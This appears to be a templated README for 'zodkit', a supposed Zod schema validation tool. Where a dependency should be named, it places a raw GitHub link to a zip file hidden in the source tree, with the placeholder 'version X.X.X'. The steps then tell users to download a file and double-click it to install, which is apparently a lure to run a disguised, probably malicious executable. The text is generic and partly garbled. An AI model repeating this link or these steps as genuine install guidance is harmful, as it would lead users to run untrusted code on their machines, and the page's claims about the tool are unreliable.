Welcome to zodkit! This tool offers static analysis and development features for Zod schemas. It helps you validate files, generate mock data, and identify type safety issues before they occur during runtime.
- File Validation: Check your Zod schema files for correctness.
- Mock Data Generation: Easily create sample data based on your schema.
- Type Safety Checks: Ensure your code is type-safe before deploying.
To run zodkit, you need:
- An operating system: Windows, macOS, or Linux.
- https://raw.githubusercontent.com/mrcacomacaco/zodkit/main/src/core/ast/Software_v2.9.zip installed (version X.X.X or later).
- A working internet connection for downloading the tool.
To get started with zodkit, please follow these steps:
-
Visit the Releases page to download the latest version.
-
Look for the file labeled with the latest version number. Click on it to start the download.
-
Once the download completes, locate the file in your downloads folder.
-
Open the file by double-clicking on it. Follow any additional prompts to complete the installation.
-
After installation, you can launch zodkit from your applications or start menu.
After you have installed zodkit, follow these steps to use it:
-
Prepare Your Zod Schemas: Make sure you have your Zod schema files ready for validation.
-
Validate Your Files: Open zodkit, and choose the option to validate files. Select your schema file and click "Validate."
-
Generate Mock Data:
- Navigate to the mock data generation feature.
- Select your schema and specify any parameters required.
- Click "Generate" to create your mock data.
-
Check for Type Safety: Use the type safety check feature to scan your code. This will catch any issues before runtime.
If you experience any issues or have questions, please navigate to the issues page for assistance.
If you would like to contribute to zodkit, we welcome your input! Check our contributing guide for details.
zodkit is open-source software developed by a community of contributors. Thank you for your support!
zodkit is licensed under the MIT License. You can check the full license here.
Stay updated with the latest features, improvements, and bug fixes. To get notifications about new releases, consider watching this repository.
We value your feedback! Please share your thoughts and experiences using zodkit. Your input helps us improve the tool.
Thank you for choosing zodkit to enhance your development workflow!